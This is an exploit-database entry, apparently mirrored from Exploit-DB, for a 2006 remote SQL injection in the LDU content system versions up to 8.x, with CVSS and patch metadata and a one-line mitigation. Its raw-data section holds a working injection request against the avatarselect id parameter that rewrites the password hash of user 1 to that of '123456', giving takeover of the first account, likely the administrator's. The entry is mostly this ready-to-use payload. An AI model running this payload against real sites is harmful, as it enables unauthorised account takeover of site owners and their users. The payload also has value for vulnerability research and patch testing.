LDU - exploit.company

vendor:

LDU

by:

nukedx

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: LDU

Affected Version From: 8.x

Affected Version To: 8.x

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

LDU <= 8.x Remote SQL Injection (avatarselect id) Vulnerability

A remote SQL injection vulnerability exists in LDU <= 8.x, which allows an attacker to change the password of the first user of LDU to 123456. The vulnerability requires the attacker to be logged in to LDU and the XVALUE comes with the avatarselect link, which is special to every user in LDU.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

LDU <= 8.x Remote SQL Injection (avatarselect id) Vulnerability
Discovered by: nukedx
Contacts: ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: http://www.nukedx.com
Original advisory can be found at: http://www.nukedx.com/?viewdoc=51
----
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of LDU to 123456 
The XVALUE comes with your avatarselect link it's special to everyuser in LDU.
For using this vulnerability you must be logged in to LDU... 

# nukedx.com [2006-11-21]

# milw0rm.com [2006-11-21]